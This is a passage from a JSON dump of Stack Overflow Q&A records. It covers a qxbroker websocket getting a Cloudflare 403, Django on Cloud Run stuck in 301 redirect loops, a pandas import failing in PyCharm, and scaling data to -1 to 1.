Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/95.0.4638.69 Safari\/537.36\n-----------------------\n--- response header ---\nHTTP\/1.1 403 Forbidden\nDate: Sat, 11 Feb 2023 23:33:11 GMT\nContent-Type: text\/html; charset=UTF-8\nTransfer-Encoding: chunked\nConnection: close\nPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()\nReferrer-Policy: same-origin\nX-Frame-Options: SAMEORIGIN\nCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0\nExpires: Thu, 01 Jan 1970 00:00:01 GMT\nSet-Cookie: __cf_bm=7TD4hk4.bntJRdP6w9K.AjXF5MsV9LERTJV00jL2Uww-1676158391-0-AZFOKw90ZYdyy4RxX1xJ4jZQMt74+3UkQDZpDrdXE8BxGJULfe8j0T8EZnpUNXr2W3YHd\/FxRoO\/bPhKA2Dc0E0=; path=\/; expires=Sun, 12-Feb-23 00:03:11 GMT; domain=.qxbroker.com; HttpOnly; Secure; SameSite=None\nServer-Timing: cf-q-config;dur=6.9999950937927e-06\nServer: cloudflare\nCF-RAY: 7980e3583b6a0785-MRS","Title":"How to creat connection websocket qxbroker in python","Tags":"python-3.x,websocket,cloudflare","AnswerCount":2,"A_Id":75536817,"Answer":"i resolved the problem sending \"header\" parameter = {\n\"User-Agent\": \"Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko)\"\n}","Users Score":2,"is_accepted":false,"Score":0.1973753202,"Available Count":2},{"Q_Id":75430998,"CreationDate":"2023-02-13 00:16:54","Q_Score":2,"ViewCount":106,"Question":"I am trying to deploy a Django app in a container to Cloud Run. I have it running well locally using Docker. However, when I deploy it to Cloud Run, I get infinite 301 redirects. The Cloud Run logs do not seem to show any meaningful info about why that happens. Below is my Dockerfile that I use for deployment:\n# Pull base image\nFROM python:3.9.0\n\n# Set environment variables\nENV PIP_DISABLE_PIP_VERSION_CHECK 1\nENV PYTHONDONTWRITEBYTECODE 1\nENV PYTHONUNBUFFERED 1\n\n# Set work directory\nWORKDIR \/code\n\n# Install dependencies\nCOPY requirements.txt requirements.txt\nRUN pip install -r requirements.txt && \\\n adduser --disabled-password --no-create-home django-user\n\n# Copy project\nCOPY . \/code\n\nUSER django-user\n\n# Run server\nCMD exec gunicorn -b :$PORT my_app.wsgi:application\n\nI store all the sensitive info in Secrets Manager, and the connection to it seems to work fine (I know because I had an issue with it and now I fixed that).\nCould you suggest what I might have done wrong, or where can I look for hints as to why the redirects happen? Thank you!\nEDIT:\nHere are the settings for ALLOWED_HOSTS and ROOT_URLCONF\nCLOUDRUN_SERVICE_URL = env(\"CLOUDRUN_SERVICE_URL\", default=None)\nif CLOUDRUN_SERVICE_URL:\n ALLOWED_HOSTS = [urlparse(CLOUDRUN_SERVICE_URL).netloc]\n CSRF_TRUSTED_ORIGINS = [CLOUDRUN_SERVICE_URL]\n # SECURE_SSL_REDIRECT = True\n SECURE_PROXY_SSL_HEADER = (\"HTTP_X_FORWARDED_PROTO\", \"https\")\nelse:\n ALLOWED_HOSTS = [\"*\"]\n\nROOT_URLCONF = 'my_app.urls'\n\nEDIT 2:\nHere are the Cloud Run logs:\n[\n {\n \"insertId\": \"63ea0f3a0009301fc1588a44\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.016940322s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"configuration_name\": \"stokkio-test\",\n \"project_id\": \"stokkio\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"service_name\": \"stokkio-test\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.602143Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/64be6aa2f943773a97b8dca48c08183f\",\n \"receiveTimestamp\": \"2023-02-13T10:21:46.738718368Z\",\n \"spanId\": \"12503801728925259527\"\n },\n {\n \"insertId\": \"63ea0f3a000a1ab20ae2502b\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015862415s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"project_id\": \"stokkio\",\n \"location\": \"europe-west4\",\n \"service_name\": \"stokkio-test\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"configuration_name\": \"stokkio-test\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.662194Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/b9918384299b4f2d5abaf95d3b191b52\",\n \"receiveTimestamp\": \"2023-02-13T10:21:46.738718368Z\",\n \"spanId\": \"4996242098785213790\"\n },\n {\n \"insertId\": \"63ea0f3a000aca32edc19ff5\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015062643s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"project_id\": \"stokkio\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"configuration_name\": \"stokkio-test\",\n \"service_name\": \"stokkio-test\",\n \"location\": \"europe-west4\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.707122Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/902a25de57f137b27daadd636246369a\",\n \"receiveTimestamp\": \"2023-02-13T10:21:46.738718368Z\",\n \"spanId\": \"12127042401513465971\"\n },\n {\n \"insertId\": \"63ea0f3a000b8d87125ec41c\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"720\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.016173479s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"service_name\": \"stokkio-test\",\n \"location\": \"europe-west4\",\n \"configuration_name\": \"stokkio-test\",\n \"project_id\": \"stokkio\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.757127Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/02532852f1783bc16f2b66b7941c300e\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.071599643Z\",\n \"spanId\": \"5082316244221461602\"\n },\n {\n \"insertId\": \"63ea0f3a000ce2f9bb9dbffa\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.017867221s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"service_name\": \"stokkio-test\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"configuration_name\": \"stokkio-test\",\n \"location\": \"europe-west4\",\n \"project_id\": \"stokkio\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.844537Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/933a163da353fbb6b81f2f4bb37cff36\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.071599643Z\",\n \"spanId\": \"5044082674168555502\"\n },\n {\n \"insertId\": \"63ea0f3a000d9928e046cc4c\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"720\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015601548s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"location\": \"europe-west4\",\n \"project_id\": \"stokkio\",\n \"service_name\": \"stokkio-test\",\n \"configuration_name\": \"stokkio-test\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.891176Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/37376b9045f8fc7b148437d39ba49bfe\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.071599643Z\",\n \"spanId\": \"3090697929386714415\"\n },\n {\n \"insertId\": \"63ea0f3a000e47cbe8acf1d4\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"720\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015684058s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"configuration_name\": \"stokkio-test\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"service_name\": \"stokkio-test\",\n \"project_id\": \"stokkio\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.935883Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/1aef8aebf520c8b999ff475465ae402d\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.071599643Z\",\n \"spanId\": \"5530487600267712102\"\n },\n {\n \"insertId\": \"63ea0f3a000f124e3e217c45\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.017848766s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"project_id\": \"stokkio\",\n \"configuration_name\": \"stokkio-test\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"service_name\": \"stokkio-test\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:46.987726Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/fa978438d859dd302167f39f941934ec\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.071599643Z\",\n \"spanId\": \"1186815225754169043\"\n },\n {\n \"insertId\": \"63ea0f3b00008ee9db5031dc\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015688891s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"service_name\": \"stokkio-test\",\n \"configuration_name\": \"stokkio-test\",\n \"project_id\": \"stokkio\",\n \"revision_name\": \"stokkio-test-00007-nah\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.036585Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/24aedf0be321b5b72768e877459d8ceb\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.071599643Z\",\n \"spanId\": \"10950882171467594641\"\n },\n {\n \"insertId\": \"63ea0f3b00015a4c9feb5375\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"718\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.017323986s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"configuration_name\": \"stokkio-test\",\n \"service_name\": \"stokkio-test\",\n \"project_id\": \"stokkio\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.088652Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/bc99cdb404d30d79eeca345aa9e1e08f\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.404890035Z\",\n \"spanId\": \"9075675780908094052\"\n },\n {\n \"insertId\": \"63ea0f3b00020e2a8050452d\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"720\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015765805s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"project_id\": \"stokkio\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"configuration_name\": \"stokkio-test\",\n \"service_name\": \"stokkio-test\",\n \"location\": \"europe-west4\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.134698Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/2ff445dd04e8f2d88a65f45af2a15e00\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.404890035Z\",\n \"spanId\": \"93159101454760213\"\n },\n {\n \"insertId\": \"63ea0f3b0002e5a790b8b27f\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"718\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.016101403s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"configuration_name\": \"stokkio-test\",\n \"service_name\": \"stokkio-test\",\n \"location\": \"europe-west4\",\n \"project_id\": \"stokkio\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.189863Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/33c3a83942c227fd78262d7bbd5e3c0c\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.404890035Z\",\n \"spanId\": \"1509834668974463252\"\n },\n {\n \"insertId\": \"63ea0f3b00039c080261c60b\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015538512s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"service_name\": \"stokkio-test\",\n \"configuration_name\": \"stokkio-test\",\n \"location\": \"europe-west4\",\n \"project_id\": \"stokkio\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.236552Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/34452d901bf9e91f11103df834fa9e40\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.404890035Z\",\n \"spanId\": \"8356040364675355850\"\n },\n {\n \"insertId\": \"63ea0f3b0004863bb01e0463\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"719\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.014853111s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"configuration_name\": \"stokkio-test\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"project_id\": \"stokkio\",\n \"service_name\": \"stokkio-test\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.296507Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/140e39f594ea8a6e074bc4435dc5a510\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.404890035Z\",\n \"spanId\": \"12869781596943932295\"\n },\n {\n \"insertId\": \"63ea0f3b00054f5971f9d391\",\n \"httpRequest\": {\n \"requestMethod\": \"GET\",\n \"requestUrl\": \"https:\/\/stokkio-test-bizhlx6wsq-ez.a.run.app\/\",\n \"requestSize\": \"718\",\n \"status\": 301,\n \"responseSize\": \"821\",\n \"userAgent\": \"Mozilla\/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko\/20100101 Firefox\/110.0\",\n \"remoteIp\": \"80.208.2.138\",\n \"serverIp\": \"216.239.32.53\",\n \"latency\": \"0.015427982s\",\n \"protocol\": \"HTTP\/1.1\"\n },\n \"resource\": {\n \"type\": \"cloud_run_revision\",\n \"labels\": {\n \"location\": \"europe-west4\",\n \"service_name\": \"stokkio-test\",\n \"revision_name\": \"stokkio-test-00007-nah\",\n \"project_id\": \"stokkio\",\n \"configuration_name\": \"stokkio-test\"\n }\n },\n \"timestamp\": \"2023-02-13T10:21:47.347993Z\",\n \"severity\": \"INFO\",\n \"labels\": {\n \"instanceId\": \"00f8b6bdb8eceaf16c38c4476e4bc4b018e5c36e674ddb382e5d1a5654e23693e60d6682d498b0cde1680fb9104257c4ef191c90bb395e9dd78bdef2870378149e\"\n },\n \"logName\": \"projects\/stokkio\/logs\/run.googleapis.com%2Frequests\",\n \"trace\": \"projects\/stokkio\/traces\/99472b16d5ee9c8a6ff9e687b43a6ca9\",\n \"receiveTimestamp\": \"2023-02-13T10:21:47.404890035Z\",\n \"spanId\": \"11202554865495003658\"\n }\n]","Title":"Django app on Cloud Run infinite redirects (301)","Tags":"python,django,docker,google-cloud-run","AnswerCount":1,"A_Id":75431802,"Answer":"Specify the valid 'ALLOWED_HOSTS' for the app from the Django settings in your case hostname will be cloud Run the service you deployed. Secondly, configure the root URL 'ROOT_URLCONF' for your App.","Users Score":3,"is_accepted":true,"Score":1.2,"Available Count":1},{"Q_Id":75431371,"CreationDate":"2023-02-13 02:04:00","Q_Score":1,"ViewCount":204,"Question":"I have recently attempted to install pandas through pip. It appears to go through the process of installing pandas and all dependencies properly. After I update to the latest version through cmd as well and everything appears to work; typing in pip show pandas gives back information as expected with the pandas version showing as 1.5.3\nHowever, it appears that when attempting to import pandas to a project in PyCharm (I am wondering if this is where the issue lies) it gives an error stating that it can't be found. I looked through the folders to make sure the paths were correct and that pip didn't install pandas anywhere odd; it did not.\nI uninstalled python and installed the latest version; before proceeding I would like to know if there is any reason this issue has presented itself. I looked into installing Anaconda instead but that is only compatible with python version 3.9 or 3.1 where as I am using the newest version, 3.11.2","Title":"pip install of pandas","Tags":"python,pandas,dataframe,machine-learning,pycharm","AnswerCount":1,"A_Id":75431477,"Answer":"When this happens to me\n\nI reload the environment variables by running the command\nsource ~\/.bashrc\nright in the pycharm terminal.\n\nI make sure the I have activated the correct venv (where the package installations go) by cd to path_with_venv then running\nsource ~\/pathtovenv\/venv\/bin\/activate\n\nIf that does not work, hit CMD+, to open your project settings and and under Python Interpreter select the one with the venv that you have activated. Also check if pandas appears on the list of packages that appear below the selected interpreter, if not you may search for it and install it using this way and not the pip install way","Users Score":0,"is_accepted":false,"Score":0.0,"Available Count":1},{"Q_Id":75432346,"CreationDate":"2023-02-13 06:04:15","Q_Score":1,"ViewCount":211,"Question":"there are many ways about normalize skils for ml and dl. It is known to provide only normalization for 0 to 1.\nI want to know that is some ways to normalize -1 between 1.","Title":"Normalize -1 ~ 1","Tags":"python,machine-learning,deep-learning,data-preprocessing","AnswerCount":4,"A_Id":75432374,"Answer":"Consider re-scale the normalized value. e.g. normalize to 0..1, then multiply by 2 and minus 1 to have the value fall into the range of -1..1","Users Score":2,"is_accepted":false,"Score":0.0996679946,"Available Count":3},{"Q_Id":75432346,"CreationDate":"2023-02-13 06:04:15","Q_Score":1,"ViewCount":211,"Question":"there are many ways about normalize skils for ml and dl. It is known to provide only normalization for 0 to 1.\nI want to know that is some ways to normalize -1 between 1.","Title":"Normalize -1 ~ 1","Tags":"python,machine-learning,deep-learning,data-preprocessing","AnswerCount":4,"A_Id":75432397,"Answer":"You can use the min-max scalar or the z-score normalization here is what u can do in sklearn\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.preprocessing import StandardScaler\nor hard code it like this\nx_scaled = (x - min(x)) \/ (max(x) - min(x)) * 2 - 1 -> this one for minmaxscaler\nx_scaled = (x - mean(x)) \/ std(x) -> this one for standardscaler","Users Score":1,"is_accepted":true,"Score":1.2,"Available Count":3},{"Q_Id":75432346,"CreationDate":"2023-02-13 06:04:15","Q_Score":1,"ViewCount":211,"Question":"there are many ways about normalize skils for ml and dl. It is known to provide only normalization for 0 to 1.\nI want to know that is some ways to normalize -1 between 1.","Title":"Normalize -1 ~ 1","Tags":"python,machine-learning,deep-learning,data-preprocessing","AnswerCount":4,"A_Id":75432401,"Answer":"Yes, there are ways to normalize data to the range between -1 and 1. One common method is called Min-Max normalization. It works by transforming the data to a new range, such that the minimum value is mapped to -1 and the maximum value is mapped to 1. The formula for this normalization is:\nx_norm = (x - x_min) \/ (x_max - x_min) * 2 - 1\nWhere x_norm is the normalized value, x is the original value, x_min is the minimum value in the data and x_max is the maximum value in the data.\nAnother method for normalizing data to the range between -1 and 1 is called Z-score normalization, also known as standard score normalization. This method normalizes the data by subtracting the mean and dividing by the standard deviation. The formula for this normalization is:\nx_norm = (x - mean) \/ standard deviation\nWhere x_norm is 